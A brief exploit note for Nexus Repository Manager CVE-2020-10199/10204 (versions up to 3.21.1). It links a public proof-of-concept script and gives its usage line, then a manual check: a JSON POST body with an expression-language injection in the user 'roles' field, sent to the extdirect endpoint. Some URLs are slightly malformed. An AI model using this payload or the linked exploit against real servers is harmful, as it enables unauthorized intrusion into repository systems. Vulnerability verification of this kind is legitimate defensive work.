Nexus Repository Manager CVE-2020-10199/10204

Nexus Repository Manager OSS/Pro: <=3.21.1

Nexus Repository Manager 3.21.1
http/s:/help.sonatype.com/repomanager3/download/

Nexus POCE Exploit
https//github.com/wsfengfan/CVE-2020-10199-10204

Usage:python3 poc.py -i 127.0.0.1 -p 8081 -c cookie -csrf csrf-token


1), CVE-2020-10204

Manual verification is as follows:
Under http: // domain name: port / service / extdirecturl, replace the POST message body with the following attack payload. If the response packet returns "roles" value "this is vulnerability", it proves that the system has a vulnerability.

Attack payload: {"action":"coreui_User","method":"update","data":[{"userId":"test","version":"1.0","firstNa me":"xxx","lastName":"xxx","email":"test@qq.com","status":"active","roles":["$+{'this is vulnerability'.toUpperCase()}"]}],"type":"rpc","tid":7}


Reference:
https://www.cnblogs.com/magic-zero/p/12641068.html
https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype